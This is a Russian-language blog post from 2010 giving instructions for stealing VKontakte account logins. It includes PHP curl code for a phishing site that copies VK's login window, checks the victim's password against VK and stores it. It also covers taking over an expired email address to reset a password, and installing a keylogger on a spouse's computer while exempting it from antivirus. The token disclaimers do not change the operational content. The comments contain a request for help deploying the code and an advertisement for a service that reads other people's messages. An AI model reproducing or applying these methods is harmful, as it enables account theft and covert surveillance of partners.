Новый взлом ВКонтакте

Опубликовано 05.12.2010 в 17:05 в разделе ,

Взлом социальной сети «В Контакте» стал самой популярной тематикой, по которой мой блог находят в интернете, благодаря написанной год назад статье. Увы, вся изложенная в ней информация устарела за это время, поэтому я предлагаю Вашему вниманию новый обзор методик по взлому страниц пользователей социальной сети «В контакте».

soclike_728x90

Прежде всего, я хотел бы уточнить, что предложенные мной методики ни коим образом не относятся в этот раз к прямому взлому центрального сайта vkontakte.ru и описывают только лишь методику перехвата личных данных пользователей — логина, пароля и адреса электронной почты.

Кроме того, уточняю, что все описанные методики предоставляются только для ознакомления и применение их в реальных условиях для настоящего перехвата пользовательских данных может быть незаконным, поэтому я настоятельно рекомендую никогда не использовать их ни в реальной практике, ни даже экспериментально.

Мы рассмотрим вот такие методики «взлома»  персональных страниц, как в контакте, так и на других сайтах.

  1. Фэйк-методика.
    Перехват личных данных с помощью подставных сайтов и систем аутентификации.
  2. Метод «мёртвого мыла».
    Извлечение паролей из невнимательных и забывчивых пользователей.
  3. Домашний перехват.
    Получение входных данных, если имеется прямой доступ к компьютеру.

Остановимся на тонкостях каждой из методик отдельно.

Напоминаю ещё раз, что ничего из описанного ниже делать попросту нельзя. Побойтесь Бога и закона. Если считаете себя везучим, пройдите сюда, вдруг получится.

Уважаемые пользователи! В связи с тем, что каждый день мне приходит с десяток сообщений с просьбами помочь взломать чью бы то ни было страничку «В Контакте», я крупно, для слепых и тупых, напомню прописную истину:

Я не занимаюсь взломом «ВКонтакте» !!!

Вообще совсем никак не занимаюсь, никогда не занимался, и не стану, хватит меня об этом просить!

Теперь, пожалуй, можно и продолжить …

Фейк-методика

Самый идеальный способ перехватить пароль пользователя любого сайта — спросить у него напрямую. Как ни странно это звучит, но проще ничего и не придумаешь. Самый лучший вариант — попросить пользователя ввести его логин и пароль, и заодно и проверить их на правильность ввода.

Социальная сеть «В Контакте» создала в своей практически неприступной защите одну крупную дыру — была введена система сторонней авторизации, то есть возможность авторизоваться на любом другом сайте, используя свои данные из сети «В Контакте» как логин и пароль.

Как же этим воспользоваться? А очень просто. Прежде всего, нам понадобится действительно работающий веб-ресурс, на котором можно добавить опцию по работе с пользователями. Как создать такой сайт и что на нём разместить — проблема далеко не моя, а уже Ваша, но без такого ресурса методика лишена смысла. Основной целью данного сайта может быть что угодно, но для Вас он должен выполнять самую главную задачу — авторизовать пользователя.

Изначально, для авторизации используется стандартное всплывающее окно, в котором пользователь должен разрешить или запретить сайту впускать себя. При этом, пользователь по идее уже должен быть «залогинен» и только лишь нажать на кнопку «Продолжить». Но ведь нам нужно не это?

На своём сайте вы размещаем кнопку «Войти В Контакте», которая открывает перед нами всплывающее окно.  Внешний вид этого окна должен полностью соответствовать виду окна авторизации «В Контакте» и поэтому его код рекомендуется получать каждый раз через curl с самого контакта и обрабатывать, просто заменяя адрес входа с контактовского, на свой. Данная форма входа действительно должна авторизовать пользователей на сайта, иначе она не имеет смысла. Для проведения процедуры авторизации, можно использовать вот такой код:

$uid = null;
$umail = strtr ($u['email'], array('@' => '%40'));
$upass = $u['pass'];

$curl = curl_init ();
curl_setopt ($curl, CURLOPT_URL, 'http://login.vk.com/?act=login');
curl_setopt ($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7");
curl_setopt ($curl, CURLOPT_REFERER, 'http://vkontakte.ru/index.php');
curl_setopt ($curl, CURLOPT_TIMEOUT, 15);
curl_setopt ($curl, CURLOPT_POST, 1);
curl_setopt ($curl, CURLOPT_POSTFIELDS, 'email='.$umail.'&pass='.$upass.'&expire=&vk=');
curl_setopt ($curl, CURLOPT_HEADER, 1);
curl_setopt ($curl, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec ($curl);
curl_close ($curl);

if (preg_match ("#l\=([0-9]+)\;#si", $result, $uid)) $uid = $uid[1];

С его помощью производится авторизация на сайте. При этом, $u[’email’] — это логин пользователя, а $u[‘pass’] — его не зашифрованный пароль. Процедура авторизации в данном случае стандартна — если $uid будет больше нуля, значит логин и пароль введён правильно, если нет — то выдаём пользователю сообщение об ошибке. Все сообщения и виды окон обязательно нужно копировать напрямую с контакта. При успешной авторизации, логин, пароль и номер пользователя заносятся в таблицу пользователей сайта, откуда их и можно получать в дальнейшем, для своего гнусного использования.

Метод «мёртвого мыла»

Иногда горе-взломщикам везёт настолько, что вся их работа по вскрытию странички сводится к трём минутам. Для данной методики нам прежде всего понадобится точно узнать адрес электронной почты жертвы. Как? Попробуйте глянуть здесь. После получения адреса почты, проверяем наше везение.

Дело в том, что иногда пользователи регистрируются на сайте, создавая себе «левую» почту, и совершенно о ней забывают. Большинство почтовых сервисов такие адреса почты попросту удаляют за неиспользование. Отсюда вывод — регистрация есть, а почты нет … Сразу же, узнав почту жертвы, мы должны рвануть на её почтовый сервис (для чайников — как правило, это та хрень, что в адресе после собаки) и пытаемся зарегистрироваться под таким же адресом. Если у нас получается, то всё, считайте нам повезло! Сразу же после регистрации лезем в контакт, там пытаемся восстановить пароль на имеющийся адрес электронной почты. Восстановился? Поздравляю, Вы — везунчик.

Домашний перехват

Наиболее часто ко мне обращаются за помощью именно те люди, кто имеет прямой доступ к компьютеру жертвы, или могут предоставить жертве свой собственный компьютер. Многие мужья и жены подозревают своих вторых недополовинок в неверности и измене. У таких людей всегда есть доступ к компьютеру жертвы. В таком случае, перехват упрощается в разы.

Для уточнения пароля, мы можем воспользоваться программой автоматической слежки «Эксперт Домашний» из бесплатного сегмента интернета. Эта программа устанавливается на компьютер пользователя и регистрирует всю его активность.

Скачать программу можно так:

  1. Софт Обзор или Софт Сёрч
  2. Где-то ещё и ещё

Ваша задача — установить данную программу на свой компьютер или компьютер жертвы, к которому Вы гарантированно имеете доступ. При установке, программа попросит Вас выбрать кнопку вызова и пароль для своей работы, их Вы будете использовать при просмотре статистики. После установки, не забудьте добавить файл C:\Windows\expertmon.exe в исключения в Вашем антивирусе — этот файл гарантированно будет признан вредоносной программой и антивирус не позволит ему нормально работать!

Интерфейс программы Expert Home

После установки программы, Вам остаётся только лишь ждать. Для удобства, Вы можете очистить куки и сохранённые пароли в браузере своей жертвы, чтобы она гарантированно ввела их заново. После того, как Вы уверены, что жертва воспользовалась «Контактом» на компьютере-шпионе, Вам остаётся только лишь открыть программу, выбрать отчёт по клавиатуре, указать интересующую Вас программу (например, iexplore.exe, opera.exe, firefox.exe) и просмотреть все введённые символы. Пароль из такого отчёта вычленяется мгновенно.

Эти методики помогут Вам справиться с проблемой получения личных данных пользователей, но помните, применять их на практике строго запрещено, это является нарушением закона! Вы не имеете права получать доступ к личной информации пользователей обманным путём.

  • Саша Высокостный

    Как этот код вставить то? на юкозе не получается как правильно это сделать??

  • ВЯяячеслав

    На днях поругался с девушкой думал что изменяет,друзья посоветовали обратиться по этому номеру 8 928 201 74 71,мне предоставили всю ее переписку,оказалось что скандал произошел напрасно,так что советую тоже всем оброщаться,не пожалеете